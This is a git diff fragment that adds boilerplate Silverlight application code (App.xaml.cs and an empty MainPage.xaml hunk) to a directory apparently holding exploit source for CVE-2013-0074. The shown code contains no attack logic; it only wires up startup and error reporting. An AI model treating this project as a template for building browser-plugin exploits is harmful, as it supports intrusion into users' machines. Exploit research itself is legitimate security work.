b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs new file mode 100755 index 0000000000..c3c386304a --- /dev/null +++ b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs @@ -0,0 +1,65 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Windows; +using System.Windows.Controls; +using System.Windows.Documents; +using System.Windows.Input; +using System.Windows.Media; +using System.Windows.Media.Animation; +using System.Windows.Shapes; + +namespace SilverApp1 +{ + public partial class App : Application + { + + public App() + { + this.Startup += this.Application_Startup; + this.Exit += this.Application_Exit; + this.UnhandledException += this.Application_UnhandledException; + + InitializeComponent(); + } + + private void Application_Startup(object sender, StartupEventArgs e) + { + this.RootVisual = new MainPage(e.InitParams); + } + + private void Application_Exit(object sender, EventArgs e) + { + + } + + private void Application_UnhandledException(object sender, ApplicationUnhandledExceptionEventArgs e) + { + // If the app is running outside of the debugger then report the exception using + // the browser's exception mechanism. On IE this will display it a yellow alert + // icon in the status bar and Firefox will display a script error. + if (!System.Diagnostics.Debugger.IsAttached) { + + // NOTE: This will allow the application to continue running after an exception has been thrown + // but not handled. + // For production applications this error handling should be replaced with something that will + // report the error to the website and stop the application. + e.Handled = true; + Deployment.Current.Dispatcher.BeginInvoke(delegate { ReportErrorToDOM(e); }); + } + } + + private void ReportErrorToDOM(ApplicationUnhandledExceptionEventArgs e) + { + try { + string errorMsg = e.ExceptionObject.Message + e.ExceptionObject.StackTrace; + errorMsg = errorMsg.Replace('"', '\'').Replace("\r\n", @"\n"); + + System.Windows.Browser.HtmlPage.Window.Eval("throw new Error(\"Unhandled Error in Silverlight Application " + errorMsg + "\");"); + } + catch (Exception) { + } + } + } +} diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml new file mode 100755 index 0000000000..008eababf2 --- /dev/null +++ b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml @@ -0,0 +1,14 @@ + + + +